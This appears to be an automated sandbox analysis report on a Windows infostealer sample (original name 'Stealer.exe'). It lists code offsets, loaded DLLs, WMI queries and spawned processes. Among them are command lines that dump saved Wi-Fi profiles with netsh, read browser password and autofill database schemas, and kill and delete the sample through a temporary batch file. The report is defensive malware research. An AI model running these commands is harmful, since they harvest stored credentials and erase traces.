      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_051812500_2_05181250
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_051872B00_2_051872B0
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_051872C00_2_051872C0
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_052741200_2_05274120
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_052727280_2_05272728
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_05272D680_2_05272D68
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_052749780_2_05274978
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_0527EFA00_2_0527EFA0
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_052721F00_2_052721F0
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_052730300_2_05273030
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_0527C4000_2_0527C400
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_0527C8A80_2_0527C8A8
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_052794B80_2_052794B8
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_05278C880_2_05278C88
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_0527D5560_2_0527D556
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_0527495F0_2_0527495F
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_052777B80_2_052777B8
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_0527EB880_2_0527EB88
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_0527EF920_2_0527EF92
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_0527B5E80_2_0527B5E8
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_0527C3F10_2_0527C3F1
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_052782200_2_05278220
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_05270E180_2_05270E18
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_052716E80_2_052716E8
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_0527D6C20_2_0527D6C2
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_05270AD00_2_05270AD0
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_05A017A00_2_05A017A0
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_05A032300_2_05A03230
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_05A07E380_2_05A07E38
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_05A084700_2_05A08470
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_05A050780_2_05A05078
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_05A00C400_2_05A00C40
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_05A000400_2_05A00040
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_05A0DB400_2_05A0DB40
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_05A0E1480_2_05A0E148
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_05A05F580_2_05A05F58
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_05A05DA80_2_05A05DA8
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_05A029B30_2_05A029B3
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_05A07E380_2_05A07E38
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_05A07E290_2_05A07E29
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_05A0DB300_2_05A0DB30
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_05A054080_2_05A05408
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_05A084600_2_05A08460
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_05A007680_2_05A00768
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_05A0D4580_2_05A0D458
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_05DF5DD80_2_05DF5DD8
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_05DFACD00_2_05DFACD0
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_05DFBC900_2_05DFBC90
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_05DFA7C80_2_05DFA7C8
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_05DF1F880_2_05DF1F88
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_05DFB7280_2_05DFB728
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_05DFD6880_2_05DFD688
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_05DFB0F00_2_05DFB0F0
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_05DFE8980_2_05DFE898
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_05DF28880_2_05DF2888
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_05DF18480_2_05DF1848
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_05DF13F00_2_05DF13F0
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_05DF03300_2_05DF0330
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_05DF62C00_2_05DF62C0
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_05DF92B80_2_05DF92B8
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_05DFF2700_2_05DFF270
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_05DFBC800_2_05DFBC80
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_05DFB6E00_2_05DFB6E0
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_05DFE90C0_2_05DFE90C
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_05DFE8FC0_2_05DFE8FC
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_05DFE8890_2_05DFE889
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_05DFA0A80_2_05DFA0A8
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_05DF00400_2_05DF0040
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_05DF28780_2_05DF2878
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_05DF00070_2_05DF0007
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_05DFA03F0_2_05DFA03F
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_05DF0B780_2_05DF0B78
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_05DF0B680_2_05DF0B68
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_06C784C00_2_06C784C0
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_06C750F80_2_06C750F8
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_06C79CAA0_2_06C79CAA
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_06C708400_2_06C70840
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_06C734500_2_06C73450
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_06C7AA680_2_06C7AA68
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_06C73C000_2_06C73C00
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_06C735D30_2_06C735D3
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_06C73FE00_2_06C73FE0
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_06C75F800_2_06C75F80
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_06C745880_2_06C74588
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_06C701480_2_06C70148
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_06C722E80_2_06C722E8
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_06C74CF00_2_06C74CF0
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_06C78A900_2_06C78A90
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_06C784A70_2_06C784A7
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_06C78AA00_2_06C78AA0
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_06C7AA4F0_2_06C7AA4F
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_06C750500_2_06C75050
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_06C727C90_2_06C727C9
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_06C777D60_2_06C777D6
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_06C78FE80_2_06C78FE8
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_06C73BF00_2_06C73BF0
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_06C767BF0_2_06C767BF
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_06C72B520_2_06C72B52
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_06C763060_2_06C76306
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_06C743000_2_06C74300
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_06C72F160_2_06C72F16
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4236 -s 3212
      Source: 3K5MXGVOJE.exe, 00000000.00000000.887300730.000000000081C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameStealer.exeJ vs 3K5MXGVOJE.exe
      Source: 3K5MXGVOJE.exe, 00000000.00000002.1086311571.00000000714CB000.00000020.00000001.01000000.00000007.sdmpBinary or memory string: OriginalFilenameSystem.Drawing.dllT vs 3K5MXGVOJE.exe
      Source: 3K5MXGVOJE.exe, 00000000.00000002.1086311571.00000000714CB000.00000020.00000001.01000000.00000007.sdmpBinary or memory string: lastOriginalFileName vs 3K5MXGVOJE.exe
      Source: 3K5MXGVOJE.exe, 00000000.00000002.1059554645.0000000000CDE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs 3K5MXGVOJE.exe
      Source: 3K5MXGVOJE.exe, 00000000.00000002.1076558748.00000000707CB000.00000020.00000001.01000000.00000008.sdmpBinary or memory string: OriginalFilenameSystem.Windows.Forms.dllT vs 3K5MXGVOJE.exe
      Source: 3K5MXGVOJE.exe, 00000000.00000002.1061396393.0000000002CBD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs 3K5MXGVOJE.exe
      Source: 3K5MXGVOJE.exeBinary or memory string: OriginalFilenameStealer.exeJ vs 3K5MXGVOJE.exe
      Source: 3K5MXGVOJE.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@25/20@2/2
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_05DFD688 CreateToolhelp32Snapshot,0_2_05DFD688
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeMutant created: NULL
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4316:304:WilStaging_02
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1892:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4316:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2476:304:WilStaging_02
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2476:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1892:304:WilStaging_02
      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4236
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeFile created: C:\Users\user\AppData\Local\Temp\34kwy3cf.3l5Jump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmp3937.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmp3937.tmp.bat
      Source: 3K5MXGVOJE.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, NumberOfCores, MaxClockSpeed FROM Win32_Processor
      Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
      Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( ProcessId = 4236)
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: 3K5MXGVOJE.exe, 00000000.00000002.1064806844.0000000003D10000.00000004.00000800.00020000.00000000.sdmp, 3K5MXGVOJE.exe, 00000000.00000002.1064806844.0000000003E57000.00000004.00000800.00020000.00000000.sdmp, 3K5MXGVOJE.exe, 00000000.00000002.1064806844.0000000003D67000.00000004.00000800.00020000.00000000.sdmp, 3K5MXGVOJE.exe, 00000000.00000002.1072336540.00000000078B5000.00000004.00000020.00020000.00000000.sdmp, tmpF572.tmp.dat.0.dr, tmpF571.tmp.dat.0.dr, tmpF56F.tmp.dat.0.drBinary or memory string: CREATE TABLE benefit_merchant_domains (benefit_id VARCHAR NOT NULL, merchant_domain VARCHAR NOT NULL)U;
      Source: 3K5MXGVOJE.exe, 00000000.00000002.1061396393.0000000002D54000.00000004.00000800.00020000.00000000.sdmp, tmpF570.tmp.dat.0.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
      Source: 3K5MXGVOJE.exe, 00000000.00000002.1064806844.0000000003E79000.00000004.00000800.00020000.00000000.sdmp, 3K5MXGVOJE.exe, 00000000.00000002.1064806844.0000000003E97000.00000004.00000800.00020000.00000000.sdmp, 3K5MXGVOJE.exe, 00000000.00000002.1064806844.0000000003EB5000.00000004.00000800.00020000.00000000.sdmp, tmpF54B.tmp.dat.0.dr, tmpF54C.tmp.dat.0.dr, tmpF54D.tmp.dat.0.drBinary or memory string: CREATE TABLE "autofill_profile_edge_extended" ( guid VARCHAR PRIMARY KEY, date_of_birth_day VARCHAR, date_of_birth_month VARCHAR, date_of_birth_year VARCHAR, source INTEGER NOT NULL DEFAULT 0, source_id VARCHAR)[;
      Source: 3K5MXGVOJE.exeReversingLabs: Detection: 50%
      Source: unknownProcess created: C:\Users\user\Desktop\3K5MXGVOJE.exe "C:\Users\user\Desktop\3K5MXGVOJE.exe"
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c tasklist
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd" /C chcp 65001 && netsh wlan show profiles | findstr All
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profiles
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr All
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmp3937.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmp3937.tmp.bat
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe TaskKill /F /IM 4236
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe Timeout /T 2 /Nobreak
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4236 -s 3212
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c tasklistJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd" /C chcp 65001 && netsh wlan show profiles | findstr AllJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmp3937.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmp3937.tmp.batJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profilesJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr AllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe TaskKill /F /IM 4236Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe Timeout /T 2 /NobreakJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeSection loaded: edgegdi.dllJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeSection loaded: napinsp.dllJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeSection loaded: pnrpnsp.dllJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeSection loaded: wshbth.dllJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeSection loaded: nlaapi.dllJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeSection loaded: winrnr.dllJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeSection loaded: dwrite.dllJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeSection loaded: windowscodecs.dllJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeSection loaded: rasapi32.dllJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeSection loaded: rasman.dllJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeSection loaded: rtutils.dllJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeSection loaded: edputil.dllJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeSection loaded: windows.staterepositoryps.dllJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeSection loaded: appresolver.dllJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeSection loaded: slc.dllJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeSection loaded: sppc.dllJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: edgegdi.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\chcp.comSection loaded: ulib.dllJump to behavior
      Source: C:\Windows\SysWOW64\chcp.comSection loaded: fsutilext.dllJump to behavior
      Source: C:\Windows\SysWOW64\netsh.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ifmon.dllJump to behavior
      Source: C:\Windows\SysWOW64\netsh.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasmontr.dllJump to behavior
      Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasapi32.dllJump to behavior
      Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dllJump to behavior
      Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mfc42u.dllJump to behavior
      Source: C:\Windows\SysWOW64\netsh.exeSection loaded: edgegdi.dllJump to behavior
      Source: C:\Windows\SysWOW64\netsh.exeSection loaded: authfwcfg.dllJump to behavior
      Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpolicyiomgr.dllJump to behavior
      Source: C:\Windows\SysWOW64\netsh.exeSection loaded: firewallapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwbase.dllJump to behavior
      Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcmonitor.dllJump to behavior
      Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3cfg.dllJump to behavior
      Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3api.dllJump to behavior
      Source: C:\Windows\SysWOW64\netsh.exeSection loaded: onex.dllJump to behavior
      Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappcfg.dllJump to behavior
      Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ncrypt.dllJump to behavior
